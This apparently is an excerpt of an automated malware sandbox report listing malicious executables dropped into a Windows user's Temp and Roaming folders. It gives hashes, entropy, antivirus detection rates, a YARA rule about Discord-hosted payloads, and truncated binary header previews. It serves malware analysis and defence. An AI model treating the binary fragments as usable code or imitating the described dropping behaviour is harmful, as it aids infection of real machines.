                                                                                                        SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhat/DLI4M/DLI4M0kvoDLIw:ML9E4Ks2wKDE4KhK3VZ9pKhgLE4qE4jv
                                                                                                        MD5:65CF801545098D915A06D8318D296A01
                                                                                                        SHA1:456149D5142C75C4CF74D4A11FF400F68315EBD0
                                                                                                        SHA-256:32E502D76DBE4F89AEE586A740F8D1CBC112AA4A14D43B9914C785550CCA130F
                                                                                                        SHA-512:4D1FF469B62EB5C917053418745CCE4280052BAEF9371CAFA5DA13140A16A7DE949DD1581395FF838A790FFEBF85C6FC969A93CC5FF2EEAB8C6C4A9B4F1D552D
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                                        C:\Users\user\AppData\Local\Temp\293.exe
                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):905216
                                                                                                        Entropy (8bit):7.399713113456654
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
                                                                                                        MD5:852D86F5BC34BF4AF7FA89C60569DF13
                                                                                                        SHA1:C961CCD088A7D928613B6DF900814789694BE0AE
                                                                                                        SHA-256:2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
                                                                                                        SHA-512:B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        • Antivirus: Metadefender, Detection: 34%, Browse
                                                                                                        • Antivirus: ReversingLabs, Detection: 77%
                                                                                                        Reputation:unknown
                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................g.....q.I....v....h......E....x.....f.....c...Rich..................PE..L....[._................. ...2.......0.......0....@..........................P|......q......................................Xf..(....p.. ............................1..............................@Y..@............0...............................text............ .................. ..`.rdata.."?...0...@...$..............@..@.data...8....p.......d..............@....rsrc... .n..p......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        C:\Users\user\AppData\Local\Temp\2EE4.exe
                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):7336391
                                                                                                        Entropy (8bit):7.993025428513385
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:196608:76+hvICteEroXxqENE+sKsXXgvkz+AlnhMCRKsAN2aL:DInEroXjsKkXgsCMhkrNF
                                                                                                        MD5:CBE604877A46CEEBA112802BC17FFEF8
                                                                                                        SHA1:E85AB4CCBE491348C39F751162FFF71A90643ECA
                                                                                                        SHA-256:32703A3D88B3E9B8FE1A64FD1CBCC0925FC2C74BCBDEFBBD6944CBFAD0029FEC
                                                                                                        SHA-512:86F3946B813FB457D95B6635FA308DA1BF5F2C0FBD5BDCA75F7776D1A01A2D3C67A8A9E268DCC145FF575D70FBE84BE9BEB112A0D2269B955795C74468C00598
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'X.8c9.kc9.kc9.kwR.jh9.kwR.jd9.kwR.j.9.k.V#kg9.k1L.jE9.k1L.jr9.k1L.jj9.kwR.jh9.kc9.k.9.k.L.jp9.k.L.jb9.kRichc9.k................PE..d...Q..a.........."......6...T................@......................................p...`..................................................[..x...............................H... 9..............................@9..8............P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data........p.......T..............@....pdata...............`..............@..@_RDATA...............~..............@..@.rsrc...............................@..@.reloc..H...........................@..B........................................................................................................................................................................................................
                                                                                                        C:\Users\user\AppData\Local\Temp\3657.exe
                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):54272
                                                                                                        Entropy (8bit):4.125149292696976
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:s7yxMfjf6NrLqKZ6mXS9LzL1pvULIRPqY2F3991ZuBhyY8PGCz9QwAOSZCGQyBbf:KyufjSLq86mXS9LzLdqY2LHZ4cZA
                                                                                                        MD5:1B1E4286625BB189A526E910F2031C7B
                                                                                                        SHA1:650C0550F12C65D9841D10AB589FF39261018957
                                                                                                        SHA-256:C9D7CB68DEC80469C3C03B0E90C7AF1972462CA7779424DB3BFD9D44AEBAA624
                                                                                                        SHA-512:68F2366606B658FDDB2B5E9BAE2E6931FB455A230F8A4813EACB38A3D7853B9640F46FE9EE6FFD9862A509558B66C30A3494CB7231C3EF7CD784950771273155
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....vL..........."...0..............5... ...@....@.. ....................... ............@..................................4..O....@..\............................4............................................... ............... ..H............text........ ...................... ..`.rsrc...\....@......................@..@.reloc..............................@..B.................4......H........#..`............3...............................................0..:........(.......(....(.....s......o.....(.......(....(.......+..*".(.....*..0............ ...(....r...p......%.."...(.....(...........%. N..."....o....&. ....(........&.....&...(....r...pr5..pr9..p(..........%..'...(.....(....s..........%.r;..p.o....t.....+..*........B..Q.......0..7.........(.............,.....i(.....(.....o....&s .....(....o!...o"....s#......o$.....+...(%.........o&...o'.......((..
                                                                                                        C:\Users\user\AppData\Local\Temp\41A3.exe
                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3576320
                                                                                                        Entropy (8bit):7.9976863291960605
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:49152:Y+RSFqeQKgdJee+ntOkgd+TuRCg+687ZEYNFvKfDIcK8nAONaGGh:Yb8eQKg+tOV0T0z875NFKfDPK8nASA
                                                                                                        MD5:5800952B83AECEFC3AA06CCB5B29A4C2
                                                                                                        SHA1:DB51DDBDF8B5B1ABECD6CFAB36514985F357F7A8
                                                                                                        SHA-256:B8BED0211974F32DB2C385350FB62954F0B0F335BC592B51144027956524D674
                                                                                                        SHA-512:2A490708A2C5B742CEB14DE6E2180C4CB606FCCEB5F17DE69249CF532EDC37B984686B534A88AE861CC38471C5892785C26DA68C4F662959542458C583E77E38
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.................$...................@....@...........................S......!7.....................................|.N. .... M...................................................................................................................... ..........................@................0......................@................@...z..................@............ ...0......................@...........x+...P......................@.............1.........................@....rsrc........ M......L0.............@....28gybOo......N.......1.............@....adata.......pS.......6.............@...........................................................................................................................................................................................................................................................................
                                                                                                        C:\Users\user\AppData\Local\Temp\48E7.exe
                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):905216
                                                                                                        Entropy (8bit):7.399713113456654
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
                                                                                                        MD5:852D86F5BC34BF4AF7FA89C60569DF13
                                                                                                        SHA1:C961CCD088A7D928613B6DF900814789694BE0AE
                                                                                                        SHA-256:2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
                                                                                                        SHA-512:B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        • Antivirus: Metadefender, Detection: 34%, Browse
                                                                                                        • Antivirus: ReversingLabs, Detection: 77%
                                                                                                        Reputation:unknown
                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................g.....q.I....v....h......E....x.....f.....c...Rich..................PE..L....[._................. ...2.......0.......0....@..........................P|......q......................................Xf..(....p.. ............................1..............................@Y..@............0...............................text............ .................. ..`.rdata.."?...0...@...$..............@..@.data...8....p.......d..............@....rsrc... .n..p......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        C:\Users\user\AppData\Local\Temp\50E7.exe
                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                        File Type:MS-DOS executable
                                                                                                        Category:dropped
                                                                                                        Size (bytes):557664
                                                                                                        Entropy (8bit):7.687250283474463
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:fWxcQhhhhhn8bieAtJlllLtrHWnjkQrK8iBHZkshvesxViA9Og+:fWZhhhhhUATlLtrUbK8oZphveoMA9
                                                                                                        MD5:6ADB5470086099B9169109333FADAB86
                                                                                                        SHA1:87EB7A01E9E54E0A308F8D5EDFD3AF6EBA4DC619
                                                                                                        SHA-256:B4298F77E454BD5F0BD58913F95CE2D2AF8653F3253E22D944B20758BBC944B4
                                                                                                        SHA-512:D050466BE53C33DAAF1E30CD50D7205F50C1ACA7BA13160B565CF79E1466A85F307FE1EC05DD09F59407FCB74E3375E8EE706ACDA6906E52DE6F2DD5FA3EDDCD
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        • Antivirus: ReversingLabs, Detection: 50%
                                                                                                        Reputation:unknown
                                                                                                        Preview: MZ.....o...g.'.:.(3...32.....f.....C'B{b.........+..R...d:.....Q..............................................................................................................................................................................................PE..L....5...............0..$...*........... ...`....@..........................0.......@....@..................................p..........P)...........................................................................................................idata...`.............................`.pdata.......p......................@....rsrc...P)......0...................@..@.didata..........x..................@.....................................................................................................................................................................................................................................................................................................................g..L.r9..v9.<iP.hL[Kc...",..
                                                                                                        C:\Users\user\AppData\Local\Temp\72B9.exe
                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):7336385
                                                                                                        Entropy (8bit):7.993036026488077
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:196608:l++hvICteEroXxqENE+sKsXXgvkwuUxNhMC/CKN7kL:BInEroXjsKkXgs/EhWKNY
                                                                                                        MD5:AE6510D9815C44A818F722ECAE6844B8
                                                                                                        SHA1:2A34B5110F5C3C2424AE9685F57261E2546BD963
                                                                                                        SHA-256:C3CAD582268B165711E2F2B1834891C7BCB5E57A7EFB1E709E3DF19D011AD656
                                                                                                        SHA-512:8CAA9E661403D5D86F69E7C35E45CDF927EF9EC0C6045ED2CA5AF2EAAF26B4F99291EADAF2F0C8C00A31B05B228C6DF0C4BD205A7B3EC70E263313A08FFEF4F8
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'X.8c9.kc9.kc9.kwR.jh9.kwR.jd9.kwR.j.9.k.V#kg9.k1L.jE9.k1L.jr9.k1L.jj9.kwR.jh9.kc9.k.9.k.L.jp9.k.L.jb9.kRichc9.k................PE..d.....a.........."......6...T................@....................................%.p...`..................................................[..x...............................H... 9..............................@9..8............P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data........p.......T..............@....pdata...............`..............@..@_RDATA...............~..............@..@.rsrc...............................@..@.reloc..H...........................@..B........................................................................................................................................................................................................
                                                                                                        C:\Users\user\AppData\Local\Temp\7F9A.exe
                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3596288
                                                                                                        Entropy (8bit):7.997492170986202
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:49152:x+8QEA1GN2zhieKqcTe0f3nWNHiZWf5dxQNPY7wUE9E8gnH43lvn/3juAVUk3Imp:xZ3KKqcTMNIWBnYAlRo7uOUk3ll4UMS
                                                                                                        MD5:8897C1354CB525DE5F4DE514D6FE836D
                                                                                                        SHA1:2F92D4CCA4D7576603A442BBACB87450F41CFE6E
                                                                                                        SHA-256:407C68405D373D2C8EF66B004B293BE25D571348E8922D02D7B79EB20A5138DB
                                                                                                        SHA-512:A46C6F7BAF298C34607701353E136120153521326A77C787F62F8BF439BB7DEC188A757271B4C8E47E650E86272159FD5D072A1530195D60900FEB8C481F671D
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.................$...................@....@...........................S.......6.....................................|.N. ....0M...................................................................................................................... ..........................@................0......................@................@...z..................@............ ...0......................@...........?....P......................@.............1..p......................@....rsrc........0M.......0.............@....2pZFPAB......N......02.............@....adata........S.......6.............@...........................................................................................................................................................................................................................................................................
                                                                                                        C:\Users\user\AppData\Local\Temp\8ECE.exe
                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3590144
                                                                                                        Entropy (8bit):7.997643531968
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:49152:3+N1VszZfKeEM30gwJHRUy0hsgpJx7SbEmW/DNYwtinYQYwDvvEipRiGqmkNajh1:381EKrHVRA2A/+NWxYZYYDvvNji7o
                                                                                                        MD5:DA5C869D0ADE431230679390B5D183BF
                                                                                                        SHA1:A0A3EC54CDC7762F78BF1DD2C5594F9A6AF2CBC3
                                                                                                        SHA-256:98CE1395284401CDB5EBF5BDBCB02DDE9C404BEB668B7FF985794AE0408A5805
                                                                                                        SHA-512:47EA2FF52B50F1E4CB27957451D6C50F2D90B861A4BAF9A96718749368D76491CF9B1D39AA23E059A2A589DC48BD1EF0C529AE201EAD635806CA89A276C82087
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.................$...................@....@..........................pS.....#87.....................................|.N. .....M...................................................................................................................... ..........................@................0......................@................@...z..................@............ ...0......................@................P......................@.............1..`......................@....rsrc.........M.......0.............@....kujN2o2......N.......2.............@....adata.......`S.......6.............@...........................................................................................................................................................................................................................................................................
                                                                                                        C:\Users\user\AppData\Local\Temp\9460.exe
                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):301056
                                                                                                        Entropy (8bit):5.192330972647351
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3072:4/ls8LAAkcooHqeUolNx8IA0ZU3D80T840yWrxpzbgqruJnfed:Ils8LA/oHbbLAGOfT8auzbgwuJG
                                                                                                        MD5:277680BD3182EB0940BC356FF4712BEF
                                                                                                        SHA1:5995AE9D0247036CC6D3EA741E7504C913F1FB76
                                                                                                        SHA-256:F9F0AAF36F064CDFC25A12663FFA348EB6D923A153F08C7CA9052DCB184B3570
                                                                                                        SHA-512:0B777D45C50EAE00AD050D3B2A78FA60EB78FE837696A6562007ED628719784655BA13EDCBBEE953F7EEFADE49599EE6D3D23E1C585114D7AECDDDA9AD1D0ECB
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        • Antivirus: Metadefender, Detection: 46%, Browse
                                                                                                        • Antivirus: ReversingLabs, Detection: 77%
                                                                                                        Reputation:unknown
                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2t..v.i.v.i.v.i.hG..i.i.hG....i.hG..[.i.Q...q.i.v.h...i.hG..w.i.hG..w.i.hG..w.i.Richv.i.........PE..L.....b_.............................-.......0....@.......................... ...............................................e..P....................................2.............................. Y..@............0...............................text............................... ..`.rdata..D?...0...@..."..............@..@.data...X....p...$...b..............@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        C:\Users\user\AppData\Local\Temp\969F.exe
                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):20480
                                                                                                        Entropy (8bit):5.021094695416705
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:1P27QR0ir3uqVQ1Tf+1rkZlgEdLcHIH+2f9sFIILCbj4KQWylH28iYfx:1PYQR0i4krj58LIL0zy2
                                                                                                        MD5:9DA91D9E3AD909FB8EBA4D3D74344982
                                                                                                        SHA1:D5B6872D062043478CBA1002A815A013952D3837
                                                                                                        SHA-256:0417281135837E3CCC11F35B2D17A6A3672B011E85C18884F54F6FEABA7B8069
                                                                                                        SHA-512:29D672F0BB8AEE885F008F7B7EBED499E7C5D8738B9373BF169896BE85C271FAAB5BD9792C176C7CDCB1C39606F07041E1E54E8F893D1D91F49509DF927AA8A0
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\969F.exe, Author: Florian Roth
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        • Antivirus: ReversingLabs, Detection: 35%
                                                                                                        Reputation:unknown
                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...!................0..J..........rh... ........@.. ...............................1....@................................. h..O...................................Tg..8............................................ ............... ..H............text....H... ...J.................. ..`.rsrc................L..............@..@.reloc...............N..............@..B................Th......H........C..."...........e..p...........................................^..}.....(.......(.....*..*..0...............(...%.-...(.....s......s....... ....o...... ....o.....(....r...po......... ....s..........o.....[o....o.........o ....[o....o!......o"......o#....s$............io%......o&.........,...o'......o(........,..o'.........,..o'........+...*..(................"......................0............o).....(*.....s+....+..*...0...........s,.... ....(-.....(........r%..po/.
                                                                                                        C:\Users\user\AppData\Local\Temp\9779.exe
                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):324608
                                                                                                        Entropy (8bit):6.705560699768563
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:8cXfhxLWOCPRZa9XQ9XuxYADj5QTM44lq46Ue:8cXfhxKPZyK+x3NQN4l3Je
                                                                                                        MD5:043B44289E31BD54357F9A5C21833259
                                                                                                        SHA1:C042C1D364887BBF71B070C8DD6C66C08A818834
                                                                                                        SHA-256:8DC59F6481C6FE183ADAC2B720FFA276CC9F52D83521200B1A85BB5FF8E4046A
                                                                                                        SHA-512:AC7098ED6CC6922577D0C87F4E3BA6EF32973C1641C98B3C675EFBBC548A63346DE87A0026ADB850144B120604BB7B9982A69E1AA2859D0E0A3A0CCE08573756
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,..~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L...o.}`............................P.............@.................................[.......................................t...P.......(...............................................................@...............L............................text............................... ..`.data...............................@....zic................................@....wuvuhus............................@....jufot..............................@....rsrc...(............$..............@..@.reloc..dF.......H..................@..B................................................................................................................................................................................................................................................................
                                                                                                        C:\Users\user\AppData\Local\Temp\A019.exe
                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):320000
                                                                                                        Entropy (8bit):6.6829606926024825
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:+/jCnwGXFliTnwC2aJLQt55gPnHswDcEgoJgnyyB:+/jZR2GK7g/swdgoiF
                                                                                                        MD5:679831CF1F00950B4ADFFBBBA7E6AB46
                                                                                                        SHA1:F4AA59829222D5ED000849EA0167082F54B59E03
                                                                                                        SHA-256:760D44EA1A90C1B235133258A8F03BED049B5B51328AEFE4A2595B6F085DD99D
                                                                                                        SHA-512:5D88BC6FA746628F9EB792612B857D7724DA4827445EDF2A7850190358A3C9C08CAA602DF2CC92EBA96571D4C34A0E311007C8688FA437203F8EEC3185C2ED8F
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        • Antivirus: ReversingLabs, Detection: 47%
                                                                                                        Reputation:unknown
                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,..~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L......`..........................................@..................................i..........................................P.......(...............................................................@...............L............................text...n........................... ..`.data...............................@....wumened............................@....kilohe.............................@....putohox............................@....rsrc...(...........................@..@.reloc..ZF.......H..................@..B................................................................................................................................................................................................................................................................
                                                                                                        C:\Users\user\AppData\Local\Temp\A881.exe
                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):321024
                                                                                                        Entropy (8bit):6.689067457982047
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:XxPbeuhFMQH+prd0WRRa/CMjXOfo68JRD0QsGrnysp:XPTWRRZM+fuJR5sG
                                                                                                        MD5:9AF71C74219794F100EA801B528339AF
                                                                                                        SHA1:DDE2BB10F1E77E03CF9190467DB85E515D720012
                                                                                                        SHA-256:84AEC628E2903022FBC5737746812D983B65A1D1EFD1110FF7D15BA49D6D15B0
                                                                                                        SHA-512:602ACA3D539FF09F384B35FA8C2B8521F20113362E33657FCB645D3171A402DBADFF7F4E564D57B34B896CBB55E55718CFC947F61CABAD1C9058E624B9B9E6BB
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,..~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L...i.`..........................................@.................................s...........................................P.......(...............................................................@...............L............................text............................... ..`.data...............................@....mekafe.............................@....tuxu...............................@....hawoz..............................@....rsrc...(...........................@..@.reloc..ZF.......H..................@..B................................................................................................................................................................................................................................................................
                                                                                                        C:\Users\user\AppData\Local\Temp\B217.exe
                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:modified
                                                                                                        Size (bytes):537088
                                                                                                        Entropy (8bit):5.840438491186833
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:SV2DJxKmQESnLJYydpKDDCrqXSIXcZD0sgbxRo:nK1vVYcZyXSY
                                                                                                        MD5:D7DF01D8158BFADDC8BA48390E52F355
                                                                                                        SHA1:7B885368AA9459CE6E88D70F48C2225352FAB6EF
                                                                                                        SHA-256:4F4D1A2479BA99627B5C2BC648D91F412A7DDDDF4BCA9688C67685C5A8A7078E
                                                                                                        SHA-512:63F1C903FB868E25CE49D070F02345E1884F06EDEC20C9F8A47158ECB70B9E93AAD47C279A423DB1189C06044EA261446CAE4DB3975075759052D264B020262A
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?y*...............0..*...........I... ...`....@.. ....................................@.................................`I..K....`............................................................................... ............... ..H............text....)... ...*.................. ..`.rsrc........`.......,..............@....reloc...............0..............@..B.................I......H............?..........hX..}............................................(....*..0..,.......(d...8....*.~....u....s....z&8.........8........................*.......*....(d...(....*...j*.......*.......*.......*.......*....(....*.~(....(^...8....*(.........8........*.......*.......*.......*.......*....0.............*.0.............*....*.......*.......*....(....*..0.............*....*....0.............*.(....z.A.........z.A.......................*.......*.......*.......*.......
                                                                                                        C:\Users\user\AppData\Local\Temp\lnagngtg.exe
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\A881.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11619840
                                                                                                        Entropy (8bit):3.8195691800841227
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:rxPbeuhFMQH+prd0WRRa/CMjXOfo68JRD0QsGrnyspaaaaaaaaaaaaaaaaaaaaaH:rPTWRRZM+fuJR5sG
                                                                                                        MD5:673D618D671523049906C3308A9AAD4F
                                                                                                        SHA1:D0ED8C79559CE9000A8196E62B127E40A8C61CB7
                                                                                                        SHA-256:5D2E5FFDA32AC3FEEA1526B4F05363B6F1994F18C1F27993FED00ACD4FCF7C88
                                                                                                        SHA-512:57622653554190523F7BFC4C127B33974335D3C8B98C041940545B9AEF53C69555D7E858542FCA08441EF6350B9D2E5926C97C70623783C8848DE0789FE65DE8
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,..~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L...i.`..........................................@.................................s...........................................P.......(...............................................................@...............L............................text............................... ..`.data...............................@....mekafe.............................@....tuxu...............................@....hawoz..............................@....rsrc...(...........................@..@.reloc..ZF..........................@..B................................................................................................................................................................................................................................................................
                                                                                                        C:\Users\user\AppData\Roaming\rcvfbte
                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):320000
                                                                                                        Entropy (8bit):6.6829606926024825
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:+/jCnwGXFliTnwC2aJLQt55gPnHswDcEgoJgnyyB:+/jZR2GK7g/swdgoiF
                                                                                                        MD5:679831CF1F00950B4ADFFBBBA7E6AB46
                                                                                                        SHA1:F4AA59829222D5ED000849EA0167082F54B59E03
                                                                                                        SHA-256:760D44EA1A90C1B235133258A8F03BED049B5B51328AEFE4A2595B6F085DD99D
                                                                                                        SHA-512:5D88BC6FA746628F9EB792612B857D7724DA4827445EDF2A7850190358A3C9C08CAA602DF2CC92EBA96571D4C34A0E311007C8688FA437203F8EEC3185C2ED8F
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,..~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L......`..........................................@..................................i..........................................P.......(...............................................................@...............L............................text...n........................... ..`.data...............................@....wumened............................@....kilohe.............................@....putohox............................@....rsrc...(...........................@..@.reloc..ZF.......H..................@..B................................................................................................................................................................................................................................................................
                                                                                                        C:\Users\user\AppData\Roaming\rcvfbte:Zone.Identifier
                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):26
